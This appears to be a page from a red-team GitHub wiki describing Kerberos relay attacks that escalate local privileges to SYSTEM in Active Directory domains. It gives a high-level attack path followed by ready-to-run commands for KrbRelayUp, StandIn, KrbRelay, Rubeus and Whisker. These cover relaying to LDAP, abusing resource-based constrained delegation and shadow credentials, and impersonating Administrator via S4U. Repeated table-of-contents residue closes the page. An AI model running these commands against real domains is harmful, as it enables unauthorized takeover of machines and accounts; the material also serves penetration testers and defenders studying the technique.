If LDAP signing and Channel binding are enabled it is not possible.
Can be exploited to local privilege escalate to system.

High level attack path

You need to control a computer object. So for example adding a new computer object to the domain.
You need to have access to a second computer that you want to priv-esc on.
Coerce the local machine account into authentication
Relay the Kerberos to LDAP.
Perform RBCD attack, to get the TGT and then do S4U to get a service ticket.
Use the service ticket to authenticate to the local service control manager and create a new service that elevates privileges to SYSTEM.

Automated attack - KrbRelayUp

KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computername> -ComputerPassword <password>

Manual attack - RBCD

Add a computer object

StandIn.exe --computer <name> --make

Get the SID

Get-DomainComputer -Identity <computer name> -Properties objectsid

Discover available ports for the OXID resolver

CheckPort.exe

Execute krbrelay

KrbRelay.exe -spn ldap/<DC> -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd <sid of computer added to domain> -port <port in output from checkport>

Request a TGT and perform S4U to get a ST for the host.

Rubeus.exe asktgt /user:<computer account>$ /aes256:<aes256 hash> /nowrap 
Rubeus.exe s4u /user:<computer account>$ /impersonateuser:Administrator /msdsspn:host/<target computer name> /ticket:<ticket> /ptt

Use the ST to create and start a new service

https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 https://github.com/rasta-mouse/SCMUACBypass

Manual attack - Shadow credentials

Check for `msDS-KeyCredentialLink` attribute

Whisker.exe list /target:<target computer>

Discover available ports for the OXID resolver

CheckPort.exe

Execute KrbRelay

KrbRelay.exe -spn ldap/<dc.domain name> -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred -port <output from CheckPort.exe>

Run Rubeus to get TGT

The KrbRelay command will give a Rubeus command to run

Rubeus.exe asktgt /user:<user> /certificate:<certificate> /password:"<password>" /getcredentials /show /nowrap

Perform S4U2SELF to obtain host service ticket

Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:host/<computer>$ /user:<computer account> /ticket:<ticket> /ptt

Use the ST to create and start a new service

https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 https://github.com/rasta-mouse/SCMUACBypass

Kerberos relay attacks - CraigDonkin/Infrastructure GitHub Wiki

High level attack path

Links

Automated attack - KrbRelayUp

Manual attack - RBCD

Add a computer object

Get the SID

Discover available ports for the OXID resolver

Execute krbrelay

Request a TGT and perform S4U to get a ST for the host.

Use the ST to create and start a new service

Manual attack - Shadow credentials

Check for `msDS-KeyCredentialLink` attribute

Discover available ports for the OXID resolver

Execute KrbRelay

Run Rubeus to get TGT

Perform S4U2SELF to obtain host service ticket

Use the ST to create and start a new service

⚠️ GitHub.com Fallback ⚠️

Kerberos relay attacks - CraigDonkin/Infrastructure GitHub Wiki

High level attack path

Links

Automated attack - KrbRelayUp

Manual attack - RBCD

Add a computer object

Get the SID

Discover available ports for the OXID resolver

Execute krbrelay

Request a TGT and perform S4U to get a ST for the host.

Use the ST to create and start a new service

Manual attack - Shadow credentials

Check for msDS-KeyCredentialLink attribute

Discover available ports for the OXID resolver

Execute KrbRelay

Run Rubeus to get TGT

Perform S4U2SELF to obtain host service ticket

Use the ST to create and start a new service

⚠️ **GitHub.com Fallback** ⚠️

Check for `msDS-KeyCredentialLink` attribute

⚠️ GitHub.com Fallback ⚠️